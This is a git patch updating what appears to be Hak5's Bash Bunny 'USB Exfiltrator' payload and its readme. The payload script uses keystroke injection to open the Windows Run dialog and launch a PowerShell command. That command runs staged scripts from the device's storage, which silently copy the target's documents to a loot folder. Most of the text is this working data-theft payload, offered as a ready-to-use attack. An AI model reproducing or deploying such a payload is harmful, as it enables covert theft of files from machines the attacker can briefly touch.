From 4ce2b50cb26c6d8d6029d22ffb26e8cb5646d7a8 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Fri, 7 Apr 2017 16:30:44 +1000 Subject: [PATCH] Updated USB Exfiltrator payload for Bash Bunny v1.1 --- payloads/library/usb_exfiltrator/payload.txt | 17 ++++++----------- payloads/library/usb_exfiltrator/readme.md | 17 +++++++++-------- 2 files changed, 15 insertions(+), 19 deletions(-) diff --git a/payloads/library/usb_exfiltrator/payload.txt b/payloads/library/usb_exfiltrator/payload.txt index 2a958843..8df6290e 100644 --- a/payloads/library/usb_exfiltrator/payload.txt +++ b/payloads/library/usb_exfiltrator/payload.txt @@ -1,23 +1,18 @@ #!/bin/bash # -# Title: USB Exfiltration +# Title: USB Exfiltrator # Author: Hak5Darren -# Version: 1.0 +# Version: 1.1 # Target: Windows XP SP3+ # Props: Diggster, IMcPwn +# Category: Exfiltration # # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs # which in turn copies documents to the loot folder on the Bash Bunny. # -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -LED R +LED ATTACK ATTACKMODE HID STORAGE -QUACK GUI r -QUACK DELAY 100 -QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" -QUACK ENTER -LED G +RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" +LED FINISH diff --git a/payloads/library/usb_exfiltrator/readme.md b/payloads/library/usb_exfiltrator/readme.md index 7f4f62e2..a09cfab9 100644 --- a/payloads/library/usb_exfiltrator/readme.md +++ b/payloads/library/usb_exfiltrator/readme.md @@ -1,8 +1,11 @@ # Exfiltrator for Bash Bunnys -* Author: Hak5Darren -* Version: Version 1.1 -* Target: Windows +- Title: USB Exfiltrator +- Author: Hak5Darren +- Version: 1.1 +- Target: Windows XP SP3+ +- Props: Diggster, IMcPwn +- Category: Exfiltration ## Description @@ -15,11 +18,9 @@ By default the staged payload exfiltrates PDF files. Change the xcopy commands f ## STATUS -| LED | Status | -| ------------------ | -------------------------------------------- | -| White (blinking) | Setup Failed. Target didn't obtain IP | -| Red | Attack Setup | -| Green | Attack Complete | +| LED | Status | +| -------- | ------------ | +| ATTACK | Attacking :) | ## Discussion [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40225-payload-usb_exfiltrator/ "Hak5 Forum Thread")